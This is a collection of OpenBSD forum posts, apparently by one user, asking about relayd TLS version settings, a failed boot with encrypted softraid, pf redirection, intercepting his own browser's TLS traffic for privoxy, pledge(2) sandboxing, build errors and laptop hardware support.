tls ciphers "HIGH:!aNULL:!eNULL:!SSLv3:!TLSv1:!DSS:!ECDSA:!RSA:!SHA1:-ECDH:ECDHE:+SHA384:+SHA256"
pass
}

relay SendReencryptNormal {
listen on 127.0.0.1 port 7443
protocol certKlient
forward with tls to destination
}

The problem is that I can type into a terminal something like:

openssl s_server -key key.pem -cert cert.pem -accept 44330 -www -no_ssl3 -no_tls1_1 -no_tls1_2

or

openssl s_server -key key.pem -cert cert.pem -accept 44330 -www -tls1

and tell Chromium to go to https://127.0.0.1:44330/ and it will connect using TLS version 1.0.

New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES256-SHA
SSL-Session:
Protocol : TLSv1
Cipher : ECDHE-RSA-AES256-SHA
Session-ID:
Session-ID-ctx: 0100
Master-Key: EC6722729D895BEBEDAEDF1964920A6EDEC11674F5FC7F213C1449AE1CA19C393AD9952FBC7B8023ECD7767D72B47D9B
Start Time: 1452113060
Timeout : 300 (sec)
Verify return code: 0 (ok)

I can also go to https://www.ssllabs.com/ssltest/viewMyClient.html and this website also tells me that I can be connected using TLS version 1.0. So this is my main problem: I don't want to connect using TLS version 1.0. What should I add to /etc/relayd.conf to prevent that?
Re: Failed to boot after upgrading to Dec. 23 snapshot
Similar problem:

Upgrade history:
Dec 18 2015 - ok
Dec 19 2015 - ok
Dec 23 2015 - can not boot after that

partial outputs from commands:

disklabel sd0
          size     offset  fstype
a:   146805807  829967361  RAID
other not related to OpenBSD

disklabel sd1
          size     offset  fstype  fsize  bsize  cpg
a:     8388608         64  4.2BSD   2048  16384    1
c:   146805279          0  unused
other related, but I don't think they are useful for this
If I am wrong ask for more information.

bioctl softraid0
Volume      Status           Size Device
softraid0 0 Online    75164302848 sd1     CRYPTO
          0 Online    75164302848 0:0.0   noencl sd0a

machine diskinfo
DISK  BIOS  Type   Cyls  Heads  Secs  Flags  Checksum
hd0   0x80  label  1023    255    63    0x2  0xac69cac8

I am using FDE for OpenBSD current. I have upgraded as usual for me from external separate installation media. I have, as always, used bioctl to manually provision the encrypted partition:
bioctl -c C -l /dev/sd0a softraid0
then I run the upgrade. I must admit that when I normally use OpenBSD then the provisioned disc is called sd1, and when I upgrade then the provisioned disc is sd2, but that never caused a problem. I also have another warning, which I usually see but which never caused a problem either:

Making all device nodes… done
installboot: /mnt/usr/mdec/biosboot extends beyond sector 268435455. OpenBSD might not boot.
Multiprocessor machine; using bsd.mp instead of bsd.
Congratulations! something

From the bootloader I got:

Loading …..
probing: pc0 mem[something]
disk: hd0+ sr0*
>> OpenBSD/amd64 BOOT 3.29
Passphrase:
open (sr0a:/etc/boot.conf): can't read disk label
boot>
cannot open sr0a:/etc/random.seed: can't read disk label
booting sr0a:/bsd:open sr0a:/bsd: can't read disk label
Re: Failed to boot after upgrading to Dec. 23 snapshot
Topic should go to tech.. and is actually solved.
Browsers in OpenBSD with W^X support
Hello, I would like to know if there are other browsers using W^X except Firefox, which I know has this enabled. I am especially interested in the Chromium package.
Mono and GTK on OpenBSD
Hello, I would like to learn programming in C# using Mono on OpenBSD. Is it possible to easily use GtkSharp GTK# to prepare environment to create Hello World program using GTK?
Re: I have problem compiling libgdamm
It was the root cause of the problem. When I downloaded the release tarball instead of something from git.gnome.org it compiled successfully. Thanks for help.

From: "Callum Davies" <calrog...@gmail.com>
To: "Lampshade" <lampsh...@poczta.fm>;
Sent: 17:31 Sunday 2015-12-06
Subject: Re: I have problem compiling libgdamm

> I'm running current amd64. There's no need to run autogen.sh if you
> are using a release tarball of libgdamm.
I have problem compiling libgdamm
Hello, I want to compile libgdamm from source. I have tried with 3 releases and I have the same error after I type gmake. libgdamm has been extracted to /home/open/kompilacje/libgdamm/kod/

gmake[1]: Entering directory '/home/open/kompilacje/libgdamm/kod/libgdamm-4.99.8/libgda/src'
/usr/bin/perl -I"/usr/local/lib/glibmm-2.4/proc/pm" -- "/usr/local/lib/glibmm-2.4/proc/gmmproc" -I ../../tools/m4 --defs . config . ../libgdamm
Documentation: Class/Namespace for gda_dsn_split not found
Documentation: Transformed C name gda_dsn_split into C++ name gda_dsn_split
No initialization for type get4 from type GdaConfig* defined (line: get8, output param: get3, c return: gda_config_get`'())
m4 failed with exit code 1. Aborting...

What can I do to successfully compile this library?
Re: Is it possible to use pledge(2) to make something similar to firejail?
Thanks for the answers. @dan mclaughlin: But how to prevent an attacker from getting out of the chroot? Do you think it is possible to prevent this using pledge(2)? Thanks for the links. Especially Jonathan's "Re: making firefox less insecure" mail dated 2014-11-23 is worth reading for me. I wonder if pledge(2), in theory, can be used to extend his program.
Is it possible to use pledge(2) to make something similar to firejail?
Is it possible, in theory, to use pledge(2) to make something similar to firejail? https://packages.debian.org/sid/main/firejail Firejail is a Gnu/Linux program which executes Firefox as its descendant with reduced privileges. For example I would like to restrict Firefox to not write and read to directories outside the /home/firefox directory. Let's assume that I run firefox as another user than my normal account. I would restrict, using traditional Unix privileges, Firefox and all its descendants from logging in as another user to regain privileges to, for example, /home/open. I imagine that would still leave a huge attack vector to pwn the system and/or sniff passwords, but I think it is better than nothing.
Re: pf change destination port for outgoing traffic
match out on bge0 inet proto tcp to any port 80 user "_relayd" tag przekierujNaPort443
pass out quick log (all, to pflog0) inet proto tcp tagged przekierujNaPort443 rdr-to 0.0.0.0/0 port 443 bitmask

Indeed it works. Thank you very much.
Re: pf change destination port for outgoing traffic
Has anything changed during these years? I would like to do the same thing the author of the topic wanted. I want it because I am playing with relayd, privoxy and pf. I have made the chain Firefox -> relayd1 -> privoxy -> relayd2, but relayd2 seems to try to establish a tls connection to port 80 rather than 443 after the line "forward with tls to destination", if I debug the problem correctly. This topic about the chain is connected with "Re: TLS intercepting proxy [MitM]".
Re: TLS intercepting proxy [MitM]
Thanks Uwe Werler! I have not yet established the chain described in the first message, but it is due to lack of time that I didn't try. Firefox runs as the firefox user. I actually have MitM on relayd *using divert* with this pf-magic:

cat /etc/pf_kop.conf
ext_if="bge0"
int_if="lo0"
set state-policy floating
pass out quick log on $ext_if inet proto tcp to any port 443 user firefox route-to lo0
pass in quick log on lo0 inet proto tcp to any port 443 divert-to 127.0.0.1 port 8443
pass in
pass out

Thanks for all, especially Uwe Werler! I am going to try to make the chain described in the first message in a day or two.
Re: TLS intercepting proxy [MitM]
Ok, I know that relayd can decrypt traffic, then log, then encrypt. The thing is that I want to send the decrypted traffic to another process (privoxy), and then re-encrypt it. I also have a problem with Reyk's config because I can not divert outgoing traffic using pf. I have tried with rdr-to and nat-to, but it removes the destination IP address in packets. I want to intercept and alter traffic on the same box that I run Firefox on. Is this possible using pf and relayd or must I use something else?
TLS intercepting proxy [MitM]
Hello, I would like to use privoxy to scrub/delete some information in the application layer (HTTP) going out from my PC. The problem is that a lot of connections are secured with TLS, so privoxy can not filter them. Is there any way to do something like that: Firefox -> decrypt [MitM] -> privoxy -> encrypt securely -(NIC)-> Internet? It is my PC, so I can install a new certificate or something like that, but nevertheless I don't know how to achieve that result. Is this possible using relayd? Is it possible with another tool in ports or something that I can compile from source?
Changing directory for fetching source code
Hi, I would sometimes like to experiment with some options/custom config in the kernel. On the other hand that is not supported by OpenBSD. Suppose I need to reproduce a problem with the original kernel. I think a good solution for me would be to have two directories for OpenBSD's code. Instead of /usr/src/sys/ I would have:
1. /usr/original/src/sys/
2. /usr/modified/src/sys/
Question: Is changing the path to the source code directory supported by OpenBSD? I mean this as the only change to the build process covered by the FAQ. No other changes are going to be made.
Rust programming language
Hello, May 15 2015 was the release date of Rust 1.0. What is your opinion on Rust? Does it have any chance to some day be a popular programming language? Do you think that learning Rust can be good for educational purposes?
Software for time management calendar
What software do you use for this purpose?
Re: Raspberry Pi 2 Model B
Hello, I didn't know that the Raspberry Pi is so closed that it requires a closed source blob to even boot. Thanks for the responses. I am not going to buy the Raspberry Pi 2 any more (or at least not until the blob is open source). Have a good day.
Raspberry Pi 2 Model B
Hi, a new version of the Raspberry Pi is announced. Its SoC has four cores of the Cortex-A7 microarchitecture so it is compatible with ARMv7. It also has 1 GB of RAM. It has the same GPU as its predecessor: VideoCore IV 3d. For some time the GPU has had open documentation and an open (BSD licence) driver in the Linux world. The price is still $35. It should be electrically compatible with its predecessor and have the same dimensions. Are you going to support this hardware in OpenBSD?
Does the OpenBSD support well AMD's APU hardware?
Hello, I am a student from Poland (a country in Central Europe) and I would love to use OpenBSD every day. I must have a Windows operating system too. I must have it because of Autodesk's Inventor and Autocad software (in future probably also SolidWorks) and Ansys and so on. For that software I need something more powerful than Intel's GPU (not only for performance but also for quality). Today I have a laptop with Optimus (Intel's GPU + Nvidia's GPU; if Nvidia's GPU renders something, Intel's GPU is the proxy). It works well under Windows. Under Linux Intel's GPU works well and Nvidia's GPU is by default powered off. I can use it by manually typed commands. I can not do anything in the BIOS to turn off Nvidia's GPU. OpenBSD can not turn off my Nvidia's GPU (despite the fact that it neither renders nor passes through anything) and it just consumes a lot of energy from the battery and heats my laptop. So I would consider buying a new laptop with an AMD APU if it is supported well by OpenBSD and does not heat the laptop to high temperatures. Does anybody have experience with AMD APUs on OpenBSD and can let me know if it performs well? I know for a lot of you buying a laptop is relatively more affordable. Please consider that in Poland we have the same (or even a bit higher) prices of electronics and considerably lower earnings, so I don't want to make a mistake and buy hardware based on my wrong opinion about the support of AMD's GPUs in OpenBSD. I didn't post this topic in „General Hardware” because I am particularly interested in OpenBSD support, but if you consider it should land there please place this topic there. With best regards
Is there any chance to implement switch to turn off for example PCI-Express devices?
Hello, I have in my laptop many devices that I don't use, for example the DVD writer. But my greatest problem is the inability to turn off the Nvidia GPU under OpenBSD. Unfortunately I have an Optimus laptop, so I don't have a normal, independent hardware multiplexer. I have Intel and Nvidia GPUs, and the Intel GPU is the proxy for the Nvidia GPU. I don't use the Nvidia GPU under Linux and it is fine. However under OpenBSD I can't even turn off the Nvidia GPU despite that GPU not being usable due to the lack of drivers in OpenBSD for this GPU. The Intel GPU is fine for me for Linux and OpenBSD tasks (I use the Nvidia GPU for Autodesk Inventor in Windows). But the Nvidia GPU is heating my laptop despite it not being used by OpenBSD. It is a significant change in temperature: under Linux and Windows (lightweight tasks) I have about 42 Celsius degrees (°C) and under the OpenBSD default configuration when it is idle it is 67 Celsius degrees (°C); when I switched the frequency of the CPU to the lowest possible by apmd it is still about 63 Celsius degrees (°C)! I think this can reduce the lifetime of my laptop. I think that in OpenBSD there is currently no way to disable a particular device, but as I understand PCI-Express has power-management capabilities and can turn off a device. Is there any chance that in a future version of OpenBSD a switch will be implemented to turn off a particular device by advanced users via sysctl or, I don't know, the /dev directory? Something like bbswitch under Linux. In any case here is the output of my dmesg: http://daemonforums.org/showpost.php?p=50519postcount=98